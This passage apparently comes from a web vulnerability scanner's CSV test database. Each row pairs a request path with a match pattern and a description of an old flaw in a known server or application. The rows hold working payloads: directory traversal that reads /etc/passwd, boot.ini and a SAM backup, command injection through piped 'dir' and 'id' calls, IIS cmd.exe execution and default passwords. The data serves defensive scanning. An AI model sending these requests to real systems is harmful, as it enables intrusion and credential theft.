"000378","0","3b","/nsn/..%5Cutil/send.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000379","0","3b","/nsn/..%5Cutil/set.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000380","0","3b","/nsn/..%5Cutil/slist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000381","0","3b","/nsn/..%5Cutil/type.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000382","0","3b","/nsn/..%5Cutil/userlist.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000383","0","3b","/nsn/..%5Cweb/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000384","0","3b","/nsn/..%5Cweb/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000385","0","3b","/nsn/..%5Cwebdemo/env.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000386","0","3b","/nsn/..%5Cwebdemo/fdir.bas","GET","200","","","","","Netbase util access is possible which means that several utility scripts might be run (including directory listings, NDS tree enumeration and running .bas files on server","",""
"000387","19767","c","/wikihome/action/conflict.php?TemplateDir=@RFIURL","GET","PHP Version","","","","","Some versions of WikkiTikkiTavi allow external source to be included.","",""
"000388","0","1","@CGIDIRSarchie","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000389","0","1","@CGIDIRScalendar.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000390","0","1","@CGIDIRScalendar","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000391","0","1","@CGIDIRSdate","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000392","0","1","@CGIDIRSfortune","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000393","0","1","@CGIDIRSredirect","GET","200","","","","","Redirects via URL from form","",""
"000394","0","1","@CGIDIRSuptime","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000395","0","1","@CGIDIRSwais.pl","GET","200","","","","","Gateway to the unix command, may be able to submit extra commands","",""
"000396","0","2","//","GET","[Ii]ndex [Oo]f ","","","","","Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.","",""
"000397","0","2","/webtop/wdk/","GET","Directory Listing for \/wdk\/","","","","","Documentum Webtop Server appears to be installed","",""
"000398","17113","2","/SilverStream","GET","\/Pages","","","","","SilverStream allows directory listing","",""
"000399","0","2","/signon","GET","Administrator Login","","","","","Tivoli administrator login found. Test the default login of admin/admin.  Tivoli allows system administration.","",""
"000400","0","2","/upd/","GET","200","","","","","WASD Server can allow directory listings by requesting /upd/directory/. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000401","0","3","/examples/jsp/source.jsp??","GET","Directory Listing","","","","","Tomcat 3.23/3.24 allows directory listings by performing a malformed request to a default jsp. Default pages should be removed.","",""
"000402","34884","3","/lpt9","GET","FileNotFoundException:","","","","","Apache Tomcat 4.0.3 reveals the web root when requesting a non-existent DOS device. Upgrade to version 4.1.3beta or higher.","",""
"000403","0","3","/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html","",""
"000404","0","3","/cfdocs/cfcache.map","GET","Mapping","","","","","May leak directory listing, may also leave server open to a DOS","",""
"000405","0","3","/CVS/Entries","GET","200","","","","","CVS Entries file may contain directory listing information.","",""
"000406","0","3","/lpt9.xtp","GET","java\.io\.FileNotFoundException:","","","","","Resin 2.1 and Tomcat servers reveal the server path when a DOS device is requested.","",""
"000407","8450","3","/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file  \.<\/font><\/p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","",""
"000408","8450","37","@PHPMYADMINdb_details_importdocsql.php?submit_show=true&do=import&docpath=../","GET","Ignoring file  \.<\/font><\/p>","200","","","","phpMyAdmin allows directory listings remotely. Upgrade to version 2.5.3 or higher. BID-7963.","",""
"000409","0","3","/asp/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000410","0","3","/asp/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000411","0","3","/iissamples/issamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000412","0","3","/iissamples/issamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000413","0","3","/ISSamples/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000414","0","3","/ISSamples/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000415","0","3","/junk.aspx","GET","NET Framework Version:","","\[FileNotFoundException\]:","","","ASP.NET reveals its version in invalid .aspx error messages.","",""
"000416","0","3","/oc/Search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000417","0","3","/oc/Search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000418","0","3","/search/htx/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000419","0","3","/search/htx/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000420","0","3","/search/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000421","0","3","/search/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000422","0","3","/sqlqhit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000423","0","3","/SQLQHit.asp","GET","CHARACTERIZATION","","","","","This sample ASP allows anyone to retrieve directory listings.","",""
"000424","15455","3","@CGIDIRScom5..........................................................................................................................................................................................................................box","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","",""
"000425","15455","3","@CGIDIRScom5.java","GET","Execution of","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","",""
"000426","15455","3","@CGIDIRScom5.pl","GET","Execution of Perl script","","","","","Lotus reveals file system paths when requesting DOS devices with bad syntax.","",""
"000427","0","3","/?Open","GET","\.nsf","","","","","This displays a list of all databases on the server. Disable this capability via server options.","",""
"000428","0","3","/?OpenServer","GET","\\\/icons\\\/abook\\\.gif","","","","","This install allows remote users to enumerate DB names, see http://www.securiteam.com/securitynews/6W0030U35W.html","",""
"000429","0","3","/catalog.nsf","GET","200","","","","","A list of server databases can be retrieved, as well as a list of ACLs.","",""
"000430","0","3","/cersvr.nsf","GET","200","","","","","Server certificate data can be accessed remotely.","",""
"000431","50","3","/cgi-bin/testing_whatever","GET","domino\/cgi-bin","","","","","The Domino server reveals the system path to the cgi-bin directory by requesting a bogus CGI.","",""
"000432","0","3","/domlog.nsf","GET","200","","","","","The domain server logs can be accessed remotely.","",""
"000433","0","3","/events4.nsf","GET","200","","","","","The events log can be accessed remotely.","",""
"000434","0","3","/log.nsf","GET","200","","","","","The server log is remotely accessible.","",""
"000435","0","3","/names.nsf","GET","200","","","","","User names and groups can be accessed remotely (possibly password hashes as well)","",""
"000436","31150","3","/LOGIN.PWD","GET","200","","","","","MIPCD password file (passwords are not encrypted). MIPDCD should not have the web interface enabled.","",""
"000437","31150","3","/USER/CONFIG.AP","GET","200","","","","","MIPCD configuration information. MIPCD should not have the web interface enabled.","",""
"000438","0","3","@CGIDIRSmail","GET","200","","","","","Simple Perl mailing script to send form data to a pre-configured email address","",""
"000439","0","3","@CGIDIRSnph-error.pl","GET","200","","","","","Gives more information in error messages","",""
"000440","0","3","@CGIDIRSpost-query","POST","200","","","","","Echoes back result of your POST","",""
"000441","0","3","@CGIDIRSquery","GET","200","","","","","Echoes back result of your GET","",""
"000442","0","3","@CGIDIRStest-cgi.tcl","GET","200","","","","","May echo environment variables or give directory listings","",""
"000443","0","3","@CGIDIRStest-env","GET","200","","","","","May echo environment variables or give directory listings","",""
"000444","57612","3","/.perf","GET","ListenSocket","","","","","Contains Netscape/iPlanet server performance information","",""
"000445","122","3","/","get","[Ii]ndex [Oo]f ","","","","","Fasttrack can give a directory listing if issued 'get' instead of 'GET'","",""
"000446","0","3","/","INDEX","[Ii]ndex [Oo]f ","","","","","Netscape web publisher can give directory listings with the INDEX tag. Disable INDEX or Web Publisher.","",""
"000447","0","3","//","GET","Proxy autoconfig","","","","","Proxy auto configuration file retrieved.","",""
"000448","0","3","/admin-serv/config/admpw","GET","200","","","","","This file contains the encrypted Netscape admin password. It should not be accessible via the web.","",""
"000449","39140","3","/test.php%20","GET","<\?php","","","","","The OmniHTTP install may allow php/shtml/pl script disclosure.  Upgrade to the latest version.","",""
"000450","0","3","/*.*","GET","[Ii]ndex [Oo]f ","","","","","WASD Server reveals the contents of directories via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000451","0","3","/cgi-bin/cgi_process","GET","200","","","","","WASD reveals a lot of system information in this script. It should be removed.","",""
"000452","0","3","/ht_root/wwwroot/-/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000453","0","3","/JUNK(10)","GET","Document not found \.\.\. \/","","","","","WASD reveals the web root in error requests. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000454","0","3","/local/httpd$map.conf","GET","200","","","","","WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000455","0","3","/tree","GET","200","","","","","WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.","",""
"000456","0","3","@CGIDIRSindex.js0x70","GET","\\<\\\%\\=","","","","","Weblogic can be tricked into revealing JSP source by adding '0x70' to end of the URL.","",""
"000457","576","3","/%00/","GET","<\%","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000458","576","3","/%00/","GET","directory listing of","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000459","576","3","/%00/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows directory listings with %00 (or indexing is enabled), upgrade to v6.0 SP1 or higher. BID-2513","",""
"000460","576","3","/%2e/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""
"000461","576","3","/%2e/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000462","576","3","/%2e/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000463","576","3","/%2f/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""
"000464","576","3","/%2f/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000465","576","3","/%2f/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000466","576","3","/%5c/","GET","<\%","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513","",""
"000467","576","3","/%5c/","GET","directory listing of","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000468","576","3","/%5c/","GET","[Ii]ndex [Oo]f ","","","","","Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. BID-2513.","",""
"000469","576","3","/index.jsp%00x","GET","<\%=","","","","","Bea WebLogic 6.1 SP 2 discloses source by appending %00x to a JSP request. Upgrade to a version newer than 6.2 SP 2 for Win2k. BID-2513","",""
"000470","3268","2","/weblogic","GET","[Ii]ndex [Oo]f ","","","","","Directory indexing found.","",""
"000471","0","3","/%a%s%p%d","GET","\*s\?d","","","","","Format bug is present & may reveal system path, upgrade to the latest version.","",""
"000472","0","3","/index.html%20","GET","File for URL","","","","","Website may reveal file system paths by adding %20 to the end of a legitimate .html request.","",""
"000473","0","23","/852566C90012664F","GET","200","","","","","This database can be read using the replica ID without authentication.","",""
"000474","0","23","/hidden.nsf","GET","200","","","","","This database can be read without authentication. Common database name.","",""
"000475","0","23","/mail.box","GET","200","","","","","The mail database can be read without authentication.","",""
"000477","0","23","/setup.nsf","GET","200","","","","","The server can be configured remotely, or current setup can be downloaded.","",""
"000478","0","23","/statrep.nsf","GET","200","","","","","Any reports generated by the admins can be retrieved.","",""
"000479","0","23","/webadmin.nsf","GET","200","","","","","The server admin database can be accessed remotely.","",""
"000480","0","3d","@CGIDIRScgitest.exe","GET","200","","","","","This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.","",""
"000481","0","6","/examples/servlet/AUX","GET","200","","","","","Apache Tomcat versions below 4.1 may be vulnerable to DoS by repeatedly requesting this file.","",""
"000482","6666","6","@CGIDIRShpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.","",""
"000483","0","6","/cfdocs/cfmlsyntaxcheck.cfm","GET","200","","not found","","","Can be used for a DoS on the server by requesting it check all .exe's","",""
"000484","0","6","/Config1.htm","GET","200","","","","","This may be a D-Link. Some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info.","",""
"000485","0","6","/contents/extensions/asp/1","GET","200","","","","","The IIS system may be vulnerable to a DOS, see MS02-018 for details.","",""
"000486","0","6","/WebAdmin.dll?View=Logon","GET","200","","","","","Some versions of WebAdmin are vulnerable to a remote DoS (not tested). See http://www.ngssoftware.com.","",""
"000487","55370","6","@CGIDIRSPbcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.","",""
"000488","55369","6","@CGIDIRStestcgi.exe","GET","200","","","","","Sambar may be vulnerable to a DOS when a long string is passed to testcgi.exe (not attempted). Default CGI should be removed from web servers.","",""
"000489","0","6","/cgi-win/cgitest.exe","GET","200","","","","","This CGI may allow the server to be crashed remotely, see http://www.securityoffice.net/ for details.  Remove this default CGI.","",""
"000490","0","7","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","GET","root:","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","",""
"000491","0","8","/c/winnt/system32/cmd.exe?/c+dir+/OG","GET","Directory of c","","","","","This machine is infected with Code Red, or has Code Red leftovers.","",""
"000492","0","8","@CGIDIRSsnorkerz.bat","GET","200","","","","","Arguments passed to DOS CGI without checking","",""
"000493","0","8","@CGIDIRSsnorkerz.cmd","GET","200","","","","","Arguments passed to DOS CGI without checking","",""
"000494","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","\[winnt\]","","","Internal server error","","Can issue arbitrary commands to host.","",""
"000495","0","8","/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c","GET","The paramater is incorrect","","","Internal server error","","May be able to issue arbitrary commands to host.","",""
"000496","0","8","/msadc/samples/adctest.asp","GET","Remote Data Service","","","","","The IIS sample application adctest.asp may be used to remotely execute commands on the server.  RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)","",""
"000497","0","b","/JUNK(10)","GET","SecureIIS application","","","","","Server appears to be running eEye's SecureIIS application, http://www.eeye.com/.","",""
"000498","0","b","/nikto.ida","GET","Rejected-By-UrlScan","","","","","The IIS server is running UrlScan","",""
"000499","0","b","/SUNWmc/htdocs/","GET","en_US","","","","","Sun SMC (Solaris Management Console) is running.","",""
"000500","0","d","@CGIDIRSwebfind.exe?keywords=01234567890123456789","GET","500","","","","","May be vulnerable to a buffer overflow (request 2000 bytes of data). Upgrade to WebSitePro 2.5 or greater","",""
"000501","0","d","/cgi-shl/win-c-sample.exe","GET","200","","","","","win-c-sample.exe has a buffer overflow","",""
"000502","849","34","/examples/servlet/TroubleShooter","GET","TroubleShooter Servlet Output","","","","","Tomcat default JSP page reveals system information and may be vulnerable to XSS.","",""
"000503","724","8","@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","",""
"000504","724","8","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","",""
"000505","0","2","/goform/CheckLogin?login=root&password=tslinux","GET","MainPageTable","","","","","The Cyclades' web user 'root' still has the default password 'tslinux' set. This should be changed immediately. Also, the id/password is hashed to create the sessionId cookie, which is bad.","",""
"000506","57324","5","/[SecCheck]/..%2f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"000507","57324","5","/[SecCheck]/..%255c..%255c../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"000508","57324","5","/[SecCheck]/..%252f..%252f../ext.ini","GET","\[SERVICES\]","","","","","BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.","",""
"000509","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","",""
"000510","1","5","/cgi/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini","GET","\[fonts\]","","","","","The ColdFusion install allows attackers to read arbitrary files remotely","",""
"000511","0","5","/.nsf/../winnt/win.ini","GET","200","","","","","This win.ini file can be downloaded.","",""
"000512","0","5","/prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000513","0","5","/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000514","0","5","/iissamples/issamples/fastq.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000515","0","5","/iissamples/issamples/query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows arbitrary files to be retrieved from the server. MS01-033.","",""
"000516","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[fonts\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""
"000517","1210","5","/default.htm%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20","GET","\[windows\]","","","","","Server may be vulnerable to a Webhits.dll arbitrary file retrieval. Ensure Q252463i, Q252463a or Q251170 is installed. MS00-006.","",""
"000518","0","5","/................../config.sys","GET","200","","","","","PWS allows files to be read by prepending multiple '.' characters.  At worst, IIS, not PWS, should be used.","",""
"000519","0","5","/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","",""
"000520","0","5","/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files","",""
"000521","0","5","/cfdocs/expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini","GET","boot loader","","","","","Allows an attacker to view arbitrary files.","",""
"000522","5553","5","/netget?sid=user&msg=300&file=../../../../../../../../../boot.ini","GET","boot loader","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","",""
"000523","5553","5","/netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd","GET","root:","","","","","Sybex E-Trainer allows arbitrary files to be retrieved.","",""
"000524","0","5","/php/php.exe?c:\winnt\boot.ini","GET","boot loader","","","","","Apache/PHP installations can be misconfigured (according to documentation) to allow files to be retrieved remotely.","",""
"000525","53880","5","/phpping/index.php?pingto=www.test.com%20|%20dir%20c:\\","GET","boot\.ini","","","","","PHP Ping allows commands to be executed on the remote host.","",""
"000526","14484","5","/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini","GET","boot loader","","","","","The boot.ini file was retrieved by using the db4web executable.","",""
"000527","0","5","/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\boot.ini","GET","boot loader","","","","","Default scripts can allow arbitrary access to the host.","",""
"000528","59599","5","/wx/s.dll?d=/boot.ini","GET","boot loader","","","","","WebCollection Plus allows any file to be retrieved from the remote system.","",""
"000529","0","5","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","GET","resolv\.conf","","","","","This CGI allows attackers to view arbitrary files on the host.","",""
"000530","0","5","/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini","GET","boot loader","","","","","The Web_Server_4D is vulnerable to a directory traversal problem.","",""
"000531","17110","5","/servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00","GET","\[boot loader\]","","","","","The Novell Groupwise WebAcc Servlet allows attackers to view arbitrary files on the server.","",""
"000532","10424","5","@CGIDIRSSQLServ/sqlbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","",""
"000533","10420","5","@CGIDIRSstats/statsbrowse.asp?filepath=c:\&Opt=3","GET","boot\.ini","","","","","Hosting Controller versions 1.4.1 and lower can allow arbitrary files/directories to be read. Upgrade.","",""
"000534","0","5","@CGIDIRStest.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000535","0","5","@CGIDIRStst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,","GET","boot\.ini","","","","","This CGI allows attackers to execute arbitrary commands on the server.","",""
"000536","0","5","@CGIDIRSinput.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000537","0","5","@CGIDIRSinput2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000538","0","5","/ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\","GET","boot\.ini","","","","","This CGI allows attackers to read files from the server.","",""
"000539","0","5","/php/php.exe?c:\boot.ini","GET","boot loader","","","","","The Apache config allows php.exe to be called directly."," ",""
"000540","0","5","/../../../../../../../../../boot.ini","GET","boot loader","","","","","The remote server allows any system file to be retrieved remotely.","",""
"000541","0","5","/../../../../winnt/repair/sam._","GET","200","","","Forbidden","","Sam backup successfully retrieved.","",""
"000542","0","5","/..\\..\\..\\..\\..\\..\\..\\boot.ini","GET","boot loader","","","","","It is possible to read files on the server by adding /../ in front of file name.","",""
"000543","0","5","///etc/passwd","GET","root:","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","",""
"000544","0","5","///etc/hosts","GET","200","","","","","The server install allows reading of any system file by adding an extra '/' to the URL.","",""
"000545","0","5","////./../.../boot.ini","GET","boot loader","","","","","Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details.","",""
"000546","1269","5","/.cobalt/sysManage/../admin/.htaccess","GET","AuthName","","","","","Cobalt RaQ 4 server manager allows any files to be retrieved by using the path through the .cobalt directory.","",""
"000547","50624","5","/albums/userpics/Copperminer.jpg.php?cat%20/etc/passwd","GET","root:","","","","","Coppermine 1.0 RC3 may have been compromised to allow arbitrary file retreival. Upgrade to the latest at http://www.chezgreg.net/coppermine/","",""
"000548","9028","5","/autohtml.php?op=modload&mainfile=x&name=/etc/passwd","GET","root:","","","","","php-proxima 6.0 and below allows arbitrary files to be retrieved.","",""
"000549","49354","5","/atomicboard/index.php?location=../../../../../../../../../../etc/passwd","GET","root:","","","","","AtomicBoard v0.6.2 allows remote users to read arbitrary files.","",""
"000550","54099","5","/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","",""
"000551","3012","5","/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","w-agora 4.1.5 allows any file to be retrieved from the remote host.","",""
"000552","54058","5","/dev/translations.php?ONLY=%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00","GET","root:","","","","","Typo3 allows any file to be retrieved remotely. Upgrade to the latest version.","",""
"000553","0","5","/DomainFiles/*//../../../../../../../../../../etc/passwd","GET","root:","","","","","Communigate Pro 4.0b to 4.0.2 allow any file to be retrieved from the remote system.","",""
"000554","13302","5","/docs/showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini","GET","boot loader","","","","","Gafware's CFXImage allows remote users to view any file on the system.","",""
"000555","59600","5","/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1","GET","root:","","","","","eZ httpbench version 1.1 allows any file on the remote server to be retrieved.","",""
"000556","2870","5","/index.php?download=/winnt/win.ini","GET","\[fonts\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""
"000557","2870","5","/index.php?download=/windows/win.ini","GET","\[windows\]","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""
"000558","2870","5","/index.php?download=/etc/passwd","GET","root:","","","","","Snif 1.2.4 allows any file to be retrieved from the web server.","",""
"000559","59085","5","/index.php?|=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","",""
"000560","0","5","/index.php?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","",""
"000561","0","5","/index.php?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)","",""
"000562","59085","5","/index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd","GET","root:","","","","","Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.","",""
"000563","0","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../etc/passwd","GET","root:","","","","","Default JRun CGI lets users read any system file.","",""
"000564","0","5","/jsp/jspsamp/jspexamples/viewsource.jsp?source=../../../../../../../../../../boot.ini","GET","boot loader","","","","","Default JRun CGI lets users read any system file.","",""
"000565","51750","5","/k/home?dir=/&file=../../../../../../../../etc/passwd&lang=kor","GET","root:","","","","","Kebi Academy 2001 Web Solution allows any file to be retrieved from the remote system.","",""
"000566","0","5","/nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0","GET","root:","","","","","nCUBE Server Manage 1.0 allows any file to be read on the remote system.","",""
"000567","0","5","/nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0","GET","passwd","","","","","nCUBE Server Manage 1.0 allows directory listings of any location on the remote system.","",""
"000568","0","5","/phprocketaddin/?page=../../../../../../../../../../boot.ini","GET","boot loader","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","",""
"000569","2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd","GET","root:","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","",""
"000570","2829","5","/phpwebfilemgr/index.php?f=../../../../../../../../../etc","GET","passwd","","","","","phpWebFileManager v2.0.0 and prior are vulnerable to a directory traversal bug.","",""
"000571","0","5","/phptonuke.php?filnavn=/etc/passwd","GET","root:","","","","","Photonouke or myphpnuke allows arbitrary files to be retrieved from the remote host.","",""
"000572","0","5","/put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd","GET","root:","","","","","NCR's Terradata server contains a CGI that allows any file to be retrieved remotely.","",""
